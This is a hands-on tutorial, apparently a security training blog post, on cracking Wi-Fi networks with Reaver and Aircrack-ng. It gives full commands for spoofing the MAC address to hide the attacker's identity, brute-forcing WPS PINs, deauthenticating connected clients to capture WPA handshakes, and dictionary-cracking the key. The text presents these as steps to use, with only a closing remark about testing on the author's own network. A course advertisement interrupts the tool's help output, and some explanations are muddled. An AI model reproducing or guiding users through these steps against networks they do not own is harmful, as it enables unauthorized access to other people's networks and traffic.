This tutorial focuses on how to crack Wi-Fi networks that are insecurely Wi-Fi. I am using an External Wi-Fi card (AWUSO36H 802.11 b/g 5db), which is quite popular among Wi-Fi hackers and it will cost you around $20- $35 USD. The major advantages of using this ALFA card are its wide range and the user’s ability to pick all access-points nearby.

There are many software programs out there that can be used to hack Wi-Fi networks; I will be demonstrating two of the most widely used.

1) Reaver

2) Aircrack

Operating system: ubuntu 11.04

PART 1: INSTALLATION

>>A. (installing drivers of the APLHA Wi-Fi card)

>>B. (installing MACCHANGER tool)

>>C. (installation of REAVER tool)

>>D. (installation of AIRCRACK tool)

PART 2(DEMONSTRATING REAVER TOOL)

>>A. (Theory)

>>B. (demo)

PART 3(hacking using AIRCRACK tool)

>>A. (demo)

PART 1: INSTALLATION

A. Installing drivers of the APLHA Wi-Fi card

We need our Linux box to detect our ALPHA card when you plug it in to USB. Let’s see the installation process of the driver. The ALPHA card comes with a CD—Insert the CD, then open up the terminal and to go the Linux folder in the cd. Type =in “us” and enter the root password (NOTE: make sure you install everything in root privilege), then type following command to install driver:

#make         (To build up the drivers from the source code)

#make install    (Install the driver to the kernel)

#reboot     (We need to reboot system after installation)

Once you log in back into the machine after it reboots, open up the terminal and type in “iwconfig”. You will see a new wlan interface that may be wlan0 or wlan1 etc., as it may change.

In the figure above, you can see wlan1 is my new interface.

B.     Installing the MACCHANGER tool

When a person hacks into another person’s Wi-Fi network, the attacker is only really worried about concealing his or her identity and in the case of a MAC address, concealing the ID of his Wi-Fi card. If you just turn up your ALPHA card you can see the MAC address (e.g. 00:AC:CA:11:22:44) or open up the terminal and type “ifconfig” and check the wlan interface and search for “HWaddr 00:11:22:XX:XX:XX”.

We need to change the MAC address before we start the attack, so let’s download the MACCHANGER tool. Open up the terminal type the following command:

#apt-get install macchanger

NOTE: if you get error here just type “#apt-get update” in the terminal and then try the above command again. Once installation is completed, check it using following command:

#macchanger –help

If you see the help file below, then you have successfully installed the MACCHANGER tool.

GNU MAC Changer

Usage: macchanger [options] device

-h, –help Print this help

-V, –version Print version and exit

-s, –show Print the MAC address and exit

-e, –ending Don’t change the vendor bytes

-a, –another Set random vendor MAC of the same kind

-A Set random vendor MAC of any kind

-p, –permanent Reset to original, permanent hardware MAC

-r, –random Set fully random MAC

-l, –list[=keyword] Print known vendors

-m, –mac=XX:XX:XX:XX:XX:XX

–mac XX:XX:XX:XX:XX:XX Set the MAC XX:XX:XX:XX:XX:XX

Now let’s move on to the next part of the installation process.

C. Installation of the REAVER tool

Go to google.com and search for reaver-1.2.tar.gz. Download the tool, (saving it preferably to the desktop), open up the terminal (root privilege), and go to the desktop folder so you can extract the .tar file using the following command:

#tar zxvf file_name

You will see a folder created. Enter the folder using “cd file_name” from the terminal, and look for the folder which has “configure” file in it. Once you find it, type the following command from the terminal (make sure you are in the same path of the configure file in the terminal as well):

#./configure

#make

#make install

NOTE: if you get error during this process due to the dependencies (which you need to install), follow the steps below:

#apt-get install libpcap-dev

NOTE: it may also depend on sql-lite, so type below command as well

#apt-get install libsqlite3-dev

Now type following command to install:

#./configure

#make

#make install

To check that the REAVER tool is installed successfully, type following command from the terminal:

reaver

note: You will see following comments if installed successfully:

Reaver v1.4 WiFi Protected Setup Attack Tool

Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Required Arguments:

-i, –interface=<wlan> Name of the monitor-mode interface to use

-b, –bssid=<mac> BSSID of the target AP

Optional Arguments:

-m, –mac=<mac> MAC of the host system

-e, –essid=<ssid> ESSID of the target AP

-c, –channel=<channel> Set the 802.11 channel for the interface (implies -f)

-o, –out-file=<file> Send output to a log file [stdout]

-s, –session=<file> Restore a previous session file

-C, –exec=<command> Execute the supplied command upon successful pin recovery

-D, –daemonize Daemonize reaver

-a, –auto Auto detect the best advanced options for the target AP

-f, –fixed Disable channel hopping

-5, –5ghz Use 5GHz 802.11 channels

-v, –verbose Display non-critical warnings (-vv for more)

-q, –quiet Only display critical messages

-h, –help Show help

Advanced Options:

Want to learn more?? The InfoSec Institute Ethical Hacking course goes in-depth into the techniques used by malicious, black hat hackers with attention getting lectures and hands-on lab exercises. While these hacking skills can be used for malicious purposes, this class teaches you how to use the same hacking techniques to perform a white-hat, ethical hack, on your organization. You leave with the ability to quantitatively assess and measure threats to information assets; and discover where your organization is most vulnerable to black hat hackers. Some features of this course include:

  • Dual Certification - CEH and CPT
  • 5 days of Intensive Hands-On Labs
  • Expert Instruction
  • CTF exercises in the evening
  • Most up-to-date proprietary courseware available

-p, –pin=<wps pin> Use the specified 4 or 8 digit WPS pin

-d, –delay=<seconds> Set the delay between pin attempts [1]

-l, –lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]

-g, –max-attempts=<num> Quit after num pin attempts

-x, –fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]

-r, –recurring-delay=<x:y> Sleep for y seconds every x pin attempts

-t, –timeout=<seconds> Set the receive timeout period [5]

-T, –m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]

-A, –no-associate Do not associate with the AP (association must be done by another application)

-N, –no-nacks Do not send NACK messages when out of order packets are received

-S, –dh-small Use small DH keys to improve crack speed

-L, –ignore-locks Ignore locked state reported by the target AP

-E, –eap-terminate Terminate each WPS session with an EAP FAIL packet

-n, –nack Target AP always sends a NACK [Auto]

-w, –win7 Mimic a Windows 7 registrar [False]

Example:

reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv

D. Installation of AIRCRACK tool:

Open up the terminal and type following command:

#apt-get install aircrack-ng

Once the installation is done, check it by typing “airmon-ng”—you will see the output as below in the screen.

Here wlan1 is my Wi-Fi card interface. Now that we’ve completed our installation process, we can begin learning about attacks.

PART 2: hacking using REAVER tool

A. (Theory)

Before diving directly into the attack process, let us see what makes reaver tool a powerful tool for Wi-Fi attacks. The Wi-Fi Alliance introduced Wi-Fi Protected Setup (WPS; originally Wi-Fi Simple Config) in 2007 to assist home-users who knew little of wireless security and had problems setting up encryption. Basically, it’s now used to protect home-users’s network and add new wireless devices. It has a push button on the router as shown below.


Once you find the network, you need to enter the PIN (basically 8 digits) that is mentioned in the router.

WPS s still vulnerable to brute-force attacks. This flaw was revealed in December 2011 as it affects wireless routers with the WPS feature.

Initially, users were asked to disable WPS push button, but in some routers there is no way to disable WPS; so what REAVER tool does is actually counter-act the brute force attack. Let’s show how this is done practically:

B. (demo)

Step1: First we need to change our MAC address.

Now find Wi-Fi network in which WPS is enabled. Have the WASH tool already installed and functional with reaver). Open up the terminal and type the command as shown below:

#wash -i mon0

Now open up the reaver tool and type the following:

#reaver -i mon0 -b ENTER_BSSID_HERE -vv

This will take a lot of time to hack—maybe 2-4 hours to acquire information like the WPS PIN, WPA PSK ,and AP ssid. So hacking into a Wi-Fi network using the reaver tool is easy, but time-consuming.

NOTE:    While changing MAC address, look out for an error that says wlan1 is busy. If this occurs, type command as below:

#ifconfig wlan1 down        (brings down the interface)

#macchanger -A wlan1        (-A this gives a random mac address and manufacturers name)

#ifconfig wlan1 up        (brings back the wlan1 interface)

PART 3: hacking using AIRCRACK tool

A. (demo)

Step 1: Open up the terminal (be in root), and spoof your MAC address (steps are as mentioned above). Now type following command after you bring your interface up (maybe wlan0 or wlan1):

#airmon-ng start wlan1 (puts card in monitoring mode)

Step 2: Now let’s collect some Wi-Fi networks—type following commands as shown below:

#airodump-ng mon0

You can see in the picture above the BSSID,ESSID, and CHANNEL, as well as the type of encryption used. Select the BSSID which you want to crack:

(press CNTRL+C to stop it).

Step 3: Now type in:

#airodump-ng -c 1 -w (filename) –bssid (bssid) mon0            

Now, in the above screenshot you can see station right? That means a system is connected to this particular access point.

Step 4: Basically what we hack wpa/wpa2/wep here, we can only acquire through the handshake. In order to perform the handshake we take the person out of the network and then wait for him to reconnect. So let’s do it.

Type the following command:

#aireplay-ng -0 5 -a (bssid) mon0        

Now in the picture above, you can see the Deauth packet is sent to the broadcast.

NOTE: There is a possibility you may get an error while you run the command above that reads: “mon0 is on channel -1, but the AP uses channel 1″— this is basically a bug in aircrack software while you install it in ubuntu.

So you have to patch the compact-wireless package and then rebuild. Type the command as below.

#apt-get install linux-headers-$(uname -r)

#wget http://www.orbit-lab.org/kernel/compat-wireless-3.0-stable/v3.0/compat-wireless-3.0-2.tar.bz2

#tar -jxf compat-wireless-3.0-2.tar.bz2

#cd compat-wireless-3.0-2

#wget http://patches.aircrack-ng.org/channel-negative-one-maxim.patch

#apt-get install patch

#patch ./net/wireless/chan.c channel-negative-one-maxim.patch

#make

#sudo make install

#sudo make unload

#sudo reboot

Step 5: So by now a handshake file has been created and you will be able to go to the home folder and find filename_you_gave.cap. Now stop the process in Step 3 by pressing CTRL+C. Next, open up the terminal and type: “aircrack-ng drag_file_into_terminal”        

You’ll see that we need to enter our dictionary file, so let’s do it in our final step.

Step 6: Type the following command:

#aircrack-ng -w dictionary_directory handshake_file

Bingo!! KEY FOUND… (Make sure you have a good dictionary file..google will help you in it ;)

NOTE: In this demonstration, other networks are unharmed. All the above tests are conducted on my own TEST NETWORK so you can test your network with these tools. Have fun. :)